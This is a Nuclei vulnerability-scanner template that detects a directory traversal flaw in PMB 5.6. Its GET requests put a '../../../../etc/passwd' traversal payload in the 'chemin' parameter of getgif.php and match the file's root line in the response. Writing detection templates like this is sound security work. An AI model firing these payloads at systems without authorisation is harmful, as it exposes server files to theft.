nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml

27 lines
721 B
YAML

id: pmb-directory-traversal
info:
name: PMB 5.6 Directory Traversal
author: geeknik
severity: medium
description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure.
reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
tags: lfi
requests:
- method: GET
path:
- "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
- "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200